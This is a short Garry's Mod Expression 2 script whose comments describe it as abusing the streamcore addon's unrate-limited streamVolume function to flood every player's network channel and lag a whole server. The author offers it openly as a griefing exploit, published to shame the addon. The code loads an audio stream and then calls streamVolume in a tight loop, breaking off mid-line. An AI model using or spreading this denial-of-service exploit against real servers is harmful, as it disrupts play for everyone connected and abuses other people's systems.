@name Vurv's Zawarudo
# Needs streamcore, this abuses the fact that the streamVolume function is garbage and has no rate limiting
# Demolishes the reliable channel of everyone's net, which means that chat is super laggy, along with other things like placing props and stuff
# I posted this here because so many servers have streamcore, an extension that allows you to grab everyone's ips and force everyone to download (potentially malicious)
# files and they think it is incredibly secure
# That addon is a dumpster fire and they didn't even make a github so we could report stuff like this and fix it ourselves, so I don't care.
# I plan on making a webaudio extension in VExtensions anyway that replaces streamcore with more secure and efficient code.

interval(1)
streamStart(1,"https://www.dropbox.com/s/d82wce7iq7gt72w/franzlyodel.ogg?dl=1") # Replace "xx" with a dropbox link or something, it doesn't matter what it is, just needs to be a valid audio file.
while(perf()){
  streamVolume(1,
